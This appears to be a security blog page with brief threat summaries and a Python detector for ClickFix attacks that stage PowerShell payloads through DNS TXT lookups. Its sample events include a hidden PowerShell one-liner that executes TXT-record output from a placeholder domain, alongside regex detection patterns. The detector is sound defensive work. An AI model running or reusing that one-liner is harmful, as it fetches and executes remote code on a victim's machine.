Analysis of Velvet Tempest's sophisticated attack chain using ClickFix social engineering and CastleRAT backdoor deployment

Weekly insights on threats, vulnerabilities, and security best practices.

Analysis of the QuickLens Chrome extension compromise reveals sophisticated supply chain attack TTPs targeting crypto wallet credentials through ClickFix social engineering.

Attackers now have ClickFix victims run nslookup against a DNS TXT record to retrieve the PowerShell payload, so the stager is fetched through legitimate DNS resolution rather than a web download, blending into normal DNS traffic and sidestepping detection mechanisms tuned for HTTP-based payload delivery.
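A detection for the pattern described above, written as an added example (not code from the original post or from any vendor): it scans process-creation events for a PowerShell command line that queries a TXT record via nslookup and feeds the result to an execution primitive, and for nslookup.exe performing a TXT query as a child of PowerShell. The event shape (pid, ppid, image, command line), the sample events and the domain `cf.example.test` are constructed for illustration; the exact one-liner real campaigns paste will differ.

```python
"""Flag ClickFix-style staging where PowerShell pulls its payload from a DNS TXT record.

Example code, not from the original post. The process-creation event format below is a
constructed approximation of a Sysmon Event ID 1 / EDR process event.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # process image name, e.g. powershell.exe
    cmdline: str    # full command line as logged


# nslookup invoked with a TXT query type: "-type=txt", "-q=txt", "-querytype=txt".
# [^|&;]*? keeps the match inside one shell command, so a later unrelated "-type=txt"
# in a pipeline does not get attributed to an earlier nslookup.
TXT_LOOKUP = re.compile(r"\bnslookup(?:\.exe)?\b[^|&;]*?-(?:type|q|querytype)=txt\b", re.I)

# PowerShell constructs that execute a string as code.
EXEC_SINK = re.compile(r"\b(?:iex|invoke-expression)\b|\[scriptblock\]::create", re.I)

POWERSHELL = {"powershell.exe", "pwsh.exe"}


def detect(events):
    """Return (pid, severity, rule_name) tuples for suspicious events."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = e.image.lower()

        # Rule 1 (high): one PowerShell command line both resolves a TXT record and
        # executes the result. This is the shape of a pasted ClickFix one-liner.
        if img in POWERSHELL and TXT_LOOKUP.search(e.cmdline) and EXEC_SINK.search(e.cmdline):
            findings.append((e.pid, "high", "powershell_txt_lookup_exec"))
            continue

        # Rule 2 (medium): nslookup.exe doing a TXT query as a child of PowerShell.
        # Admin scripts do this too (SPF/DMARC checks), so it is a lower-confidence signal
        # that is most useful when the PowerShell parent itself came from explorer.exe
        # (the Win+R Run dialog ClickFix relies on).
        if img == "nslookup.exe" and TXT_LOOKUP.search(e.cmdline):
            parent = by_pid.get(e.ppid)
            if parent is not None and parent.image.lower() in POWERSHELL:
                findings.append((e.pid, "medium", "nslookup_txt_child_of_powershell"))
    return findings


# Constructed sample events; the malicious command line is illustrative only.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    # Pasted into the Run dialog from a fake verification page: resolve a TXT record,
    # join the lines and execute them.
    ProcEvent(200, 100, "powershell.exe",
              'powershell.exe -NoP -W Hidden -c "iex ((nslookup -type=txt cf.example.test) -join \' \')"'),
    ProcEvent(201, 200, "nslookup.exe", "nslookup -type=txt cf.example.test"),
    # Benign admin activity from a cmd prompt: MX and DMARC checks.
    ProcEvent(300, 1, "cmd.exe", "cmd.exe"),
    ProcEvent(301, 300, "nslookup.exe", "nslookup -type=mx example.com"),
    ProcEvent(302, 300, "nslookup.exe", "nslookup -type=txt _dmarc.example.com"),
    # Benign PowerShell.
    ProcEvent(400, 100, "powershell.exe", "powershell.exe -c Get-Process"),
]


if __name__ == "__main__":
    for pid, severity, rule in detect(SAMPLE_EVENTS):
        print(f"pid={pid} severity={severity} rule={rule}")
```

Run against the constructed events, the one-liner (pid 200) is flagged as high and its nslookup child (pid 201) as medium; the DMARC lookup from cmd.exe is not flagged because its parent is not PowerShell. In a real deployment, feed the same two rules with `Resolve-DnsName -Type TXT` and `dig txt` variants, and weight rule 2 by whether the PowerShell parent was spawned by explorer.exe.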

APT28 deploys previously unknown BadPaw loader and MeowMeow backdoor against Ukrainian targets via phishing campaigns, revealing advanced persistence tactics for critical infrastructure attacks.